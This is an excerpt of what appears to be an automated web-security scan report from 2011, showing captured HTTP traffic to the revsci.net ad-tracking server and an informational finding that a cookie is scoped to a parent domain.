Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsiPus_mB1L="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M80/hpep6F9WP6iKbjeCxjxvCqNxuQAGGpiitEkfuxJGEzg8jxcI8wvPXGbo0aNJ+PBq0PJ6Z4zm4GZt9KEhEUFhOlhKBWTemaH6742DHI0N2/6FP6WiqHI4/6A/dtZmKTLPRrL1piyrClflmfBSZfnYd5Vm2zchoczaQ3RWUGkvJsndZ2YTGmaaEpUPbHa6WHH8qQzApjYeDrJBH1UzbuygNAgpsXhbrbPB62kbK9yKfTZI8oFosyYAyzOFxFpo882c37Vp38T8N7Ul2pVStv9L1j+uGFviLEQC8sca4eQi+1DiNoDXqM/IN8BsXsODfE/hlMOqYk0auIigibqxioIzjgHFfpfiQ0Sf+Qu5eI5tZo6DKQboYAsfAokbZG9v+8yxxA3s4CAgk/rOowK4Z9rL0CNLLZABvPQQvb6Fl/3L+trORXWGDkEzRN/2wkV8S9ED0t+ldkzRbm7ZPRh0uZF5+5JN6zO/vcjfhM6R0VXln4no61iXmVbPSdh9MVDLJPNsQvwy7tLapT5frcuJyCuaVTB1bntqayTd5qS/xG24AkZotSmk9JGHntbpb/qkNMO4/pxAZa5mS7Evb3se0WMaPowFnYVygBTjT7SpK3IFKknqXd61Nn2O8IqIVX+J0mGQWzRSgGlZu1oPpQottl4L9W3OpjBs4qexePminO9R94+GIGWQXz6td11kVQf5WjuW8Fmubkh0ICWm/Ynub4uZ9OCpGp8z4vQqPA7KI2AzzPXoaP126GjIVNaSICB3s2RmXrC1JnHKU+LHbakDjp/QYwifgD6zxWUvDtjddggTXDajDg+7MnBW3RWS/IHmZqhyEEe0DucGZb2hf5FHzeKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3BnoKLfCydvqXQrF9dpxGkoFSFDVd5va4dSMaw7uS2qZld3DWlV5tpeUV2W3Qr12oXahUrt8/ekOJB31oKbMjTQ/6PElzKyreVGoLkPTF90/QBdRKh/Q3k5sgIIDBwFfIfEubP8z1F0X4KjeqlHHVhVC08/HcAzh3lp+L87xwXv12V3Gc72Znw5puQHh8cF5dFMBgJByT4wiNK+3RBJ0+8Zno7Mj70ShXCPoDYJO9viSdA4vbhGDYrVnqNxu2qWcDS+zi2nrahllNR0+brZPnynugQRPvjyE+Y60xVdWQIGp/c3DrzLKU245EtADE/BeE09F7uQnmFRG8pn4GEPK0Ly0iScIErGzYl09E8csnKw5pwYQVnO9a3xLuMRgjgYMV7Hl//0nkP82nOF3w8i/F1P00S+yk9nFVCLxxuK9fXnadwSb/fEA=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa25Jyk8YM/Ho/F+wsjOp3UkOhVLotjLJWEJCtlmoTB4XTp0MTFVbN99ze6Vi9gzHE60z3rwoD6Lst4VPE119Zfvq1L5bYy9AjO/WfUaKYXbf1osVVhbU+l7YcjeiBpzRE6vcfhpxTGljIHVG6wCLEocu/91zEVPuDOjmIRjqIfGM0UfLHLgv2C05WgPKu/Fu0dyKxE9Z3VVkW2CM1MuumV2qQngq9NYypxS6SUkYSpp9rrHVmT/PiehfT+ao/sgsxmUZWQiDDyNiXQFhMZxn1yW3/+uLp/sCgiNcsLywz7ZawnFFqtRwOtG9ywJRLCbbi6Qf6QyWu5ZPZvf+B9yh4THzd3jvRSwsKraHSyXBRKFSUJmeTgRo5Wb+VobukoQ/BEAlmGJDLeinaq0AWfprDXhrVL4uzGERT9iV/ZFvgLLl16SDmvClK0VlVBU/fsEzlYD7q8fVAU7jiogS+0QvnAMbNVmxayNCHy3ChZjaNwlPaqwwx67SCivFHxB9DK/5DiEFMyqX/b4nmJd1sizBco+S9u1wADdn1mEiP0cG0kQhfa8BJQp7nfqZyWsMwhyUOXknFtAlMD+/N1Tf3YLzOyBSO4R08TqDG2Nc4XDIDvE/0jS8LCVJl7JQFnZBdm+tTAB1MFykWYyofsoidj2JlJamhp3DY0/RBn6thG4Dp3s72FJUYY0XOZqyQj2v8cQFL7nM9nQoUIH51pw9a+XC6/yKJernGASO36t/t5FL9IaTAyHB/Kgk2PsUHT7JHI1FJeoXMZUWQ3IJ40P2RazBsPtOJsRHWYg1EagVzaOvOh0jjVwnZNGXxRYK7al/v2h2S+Lbrvh/S7WnfwbfpPJtgUFL2sKAk2mwRO9FRTAnLRXaZeRA85QvODnBEGs2HYhYIWOvAMNdzQg7raKfVqUTcDtULMLcnwbqeiuW0ZORlzBZg2H48M4JkC0QjZIXrp3+spukhaZZMDrzGUTmupw2Oe96u/6UbzQwbNRvXBF8fS41sao01s0agvokyA1BrEK7PTBT+8UI6MhreApqHuDCn0jEVj6Mn6NRrmBtyS5tC4RD/jw4JSD3dc1qC1sR2B1LzX5mzcbk3mUs48A2q1de2RDS/saf3Ia6pcJKnfVkJ1XR1RWKZHVOLUu7cxhypNuKdV7TAWMbtxK6Tw8PNT4aVMOgMp82kKKazsKGdmJPVsNbziG5AQCdWcKvR685TAqy1capdei3AOkD55LYQ/qwsWwHzbplal54zk5VTpo9R5gh2aJ2NZP6vmA3mJ7JYW5txoE6vdwdARPIqwcPrn5ZUErGUgqZINLPWV99rNyqFar6Y/asi56ic5yeC7VLauAtS/xPO0/it6HQW2BKKS07L2mr0vgLooN3ZwsdDhJt0gbT0PzywZzDhtIx6bu4RRQTi/Q6rWVRapJcvuixV+Z6RmY+G0tOarFkBLC25o7k6G9Ey3ohXcKjMpUfky67GTFdTi7PaDVFUHGLWRTn/AmwGe+NW5ymLXUh0/OSxD9ToW35VGT4h/S/b62tvVkK04uKekaBdS/oiSxQxixYX7IP+DK/oYJ12BNMW7ybBSJYA/TJMFCQXks+Fh5fhSLlGIVBqVGRux00vSsdzcpappO9jSyN6skIOSnSR1k5iCT9mlbWFcCNTgHxqfw49HAnX4oYtv4h+41XORJpRcgEqEfPfTfss+S0BN155VTHslgrPd+QHLEMumzCupDguXJl0xZDEtZzHgbgo1e4t5H4n0="; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z4eoyMpqLKxALV17HF2gQ4O3XYcv0liDtqNncA2iFgL2IcBvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1xGXKzaXaBtH5FPnD6taOU3kVssC9SmHYB9KeGG/XzENTJKFQaxKUNkLwv0xvwv6ry+VgYngIEBxgFkFF2aLcNH2JA8tdDcEJabBXk6s7CW81/sxD23OYhiURv44ZG2Vyw7fWwDac3umENIVkfupsNmF7BNwRypgZ1iUkGK8ES3J/9sW0+NMYS0Nx4rCbHauGZpBbtBekNAISVW7BkfpZu8IaAfV6v9iL2W3Sah5YI4MmJmv8BbaG7Z/Df/7ZFmoVbK2LWSFmintJfrwUzAeyBxulcwAJz4xaOubrb+Xvvptt9tnDj0c2GV7FHZOBpdY0b5xdDIdycbK3vOkk8GmJK105Ch0q3u8Hh9t+wXkjsCkhzxj44JhDpp6qF320JTJ2Gc5UCAVHUWPAI1koc/TaFrYnhCnjT+kKvLJlhxANciLTabps7hCaz4APVhvxQTYiS7mPVfaPTjbdi4nsm0DipWflYQywDdczj4/7M8O6bchweJ8S6wo6+0mAFNb8PuWU2r/EZQNOOBvg5lPBQwH4GqCKyLCJqhKUmvQuU47piyHDA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq3/uioEppzybAZxKwaQY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1yCXK3aX6BtHZFDnD6taOUzkZssC9SmHYB+KGGe5X1cNTJKECoUMZ4/wp7+XvOCqse5myjM47fJG9XyF3o2LcLH2JBctdDfkUpvsKp7h/8wrQqfNTmNrtJFgpskRYf+ovvy93QA4saI/5RCJ9S8KLVFBQ+BRLHzkbmX4zNmcoVxKjLhqBHgxD0FT5+Ln1KN2UyKNEy7XX5OrG9hyFdTjX30ylHdMWwEsYD/pKMRwVsoZWhFeqiNuc9cEqQSsRhxMU+2RP38baOVRIfW7/Btj8cBj5LlhrfD1Tn16oha4M5/ZotDYi5/qazTNFubn1Qt7A7EjnhWEqLIcLhI8s2+uLnXyw6x5d4nIsCtuBLdS6gErWZy3JVzYmv8h5NUyK70aIxzVqEJ31X7Jh5lt0ikrpLRZHqRm+gqnWlGok2BK90Q7cZj8HFd4Zr6+rib0GqKI2iHV1KH25wKH+p19498lf+VhpUrQ+FcB+ySMYhO2SGL9y8zm3D31ukc6uHMWlP0Ri5DxCYEj3aJUJsmrCjpLAPQLmN/9YMtoBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:52:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:52:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.125. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/152539728.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638OC50EZltz+itXswYg6aG0Cz85wyWVUagoY/y3ZrR2yFdORAExtLnEqN2My6sEyzWP3Oe/MA8C1FjR18yFHvMOs1J+Dr9NMmAZxdYL3KF+ENbS9yb/mOe297VH+NlH7TE83cuTXCnr8SOCGmMmdMA6h175yxIjBb8Mzz+EdulvJish3WpFuaj1UsbDzE/DdcFBwAjTQbVdeid7P0ZSWlEh4DBz8ZSIsBQtyIIhSOP7byyJpLCzXFOprPkZ6Z2LaGx1ar6uvvfXos1Y4bGwiXzOEz0MQNLJUAZ52Q2cej8mFe+Zr6mqja6lDLQSZuadJulAwL6WHmVZDAvAlEla/glRUyBL2+ufhADgmtrTIbBcM8tSNpifAGlhZw5PwYPffBz0FoI0Shh0kOn2LoPZG2jFUBn6Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/152539728.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbX